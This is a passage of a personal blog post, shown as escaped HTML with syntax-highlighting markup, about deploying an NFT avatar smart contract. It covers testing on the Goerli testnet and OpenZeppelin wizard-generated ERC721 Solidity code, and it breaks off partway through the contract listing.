data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;I put this at &lt;code&gt;https://necopinus.xyz/​avatar/​ethereum/​&amp;#x3C;WALLET_ADDRESS&gt;.json&lt;/code&gt; to make it straight forward to support additional wallets and blockchains in the future.&lt;/p&gt;
&lt;p&gt;Once this was done, I decided to more-or-less follow the “&lt;a href=&quot;https://docs.alchemy.com/docs/how-to-develop-an-nft-smart-contract-erc721-with-alchemy&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;How to Develop an NFT Smart Contract (ERC721) with Alchemy&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;” walk-through. I’m going to skip a lot of the details here, so if you’re trying to do this yourself you should also read through that document.&lt;/p&gt;
&lt;p&gt;I also tested deploying the smart contract and minting my NFTs on the Goerli TestNet before committing any money to deploy on the Ethereum MainNet. To do this, you’ll need to get some GoerliETH; the easiest way to do this is to create an account on &lt;a href=&quot;https://www.alchemy.com&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Alchemy&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and then visit &lt;a href=&quot;https://goerlifaucet.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;the Goerli “faucet”&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, which will transfer 0.2 GoerliETH to your wallet (more than enough for what follows.&lt;/p&gt;
&lt;p&gt;Next, go to the &lt;a href=&quot;https://docs.openzeppelin.com/contracts/4.x/wizard&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Open Zeppelin Contracts Wizard&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; to pre-generate smart contract code. I’m going to select an ERC721 contract and select the “Mintable, Autoincrement IDs”, “Enumerable”, and “URI Storage” options + uncreative contract and token names. This produces the following code.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;solidity&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;solidity&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;// SPDX-License-Identifier: MIT&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;pragma&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;tag&quot;&gt; solidity&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; ^0.8.9&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;import&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; &quot;@openzeppelin/contracts/token/ERC721/ERC721.sol&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;import&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; &quot;@openzeppelin/contracts/token/ERC721/extensions/ERC721Enumerable.sol&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;import&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; &quot;@openzeppelin/contracts/token/ERC721/extensions/ERC721URIStorage.sol&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;import&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; &quot;@openzeppelin/contracts/access/Ownable.sol&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;import&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; &quot;@openzeppelin/contracts/utils/Counters.sol&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;contract&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; NFTAvatar&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; is&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;ERC721Enumerable&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;ERC721URIStorage&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;Ownable&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt; {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;    using&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; Counters&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; for&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; Counters&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;Counter&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;    Counters&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;Counter &lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;private&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; _tokenIdCounter&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    constructor&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;) &lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;&quot;NFTAvatar&quot;, &quot;NFTAVATAR&quot;) &lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;{}&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    function&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; safeMint&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;address&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; to&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; string&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; memory&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; uri&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; public&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; onlyOwner&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt; {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;        uint256&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; tokenId &lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; _tokenIdCounter&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;current&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;();&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;        _tokenIdCounter&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;increment&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;();&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;        _safeMint&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;to&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;        _setTokenURI&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; uri&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    }&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;    // The following functions are overrides required by Solidity.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    function&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; _beforeTokenTransfer&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;address&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; address&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; to&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; uint256&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt; uint256&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; batchSize&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        internal&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        override&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; ERC721Enumerable&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;value&quot;&gt;        super&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;_beforeTokenTransfer&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; to&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; batchSize&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    }&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    function&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; _burn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;uint256&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; internal&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; override&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; ERC721URIStorage&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt; {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;value&quot;&gt;        super&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;_burn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    }&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    function&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; tokenURI&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;uint256&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        public&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        view&lt;/span&gt;&lt;/span&gt;
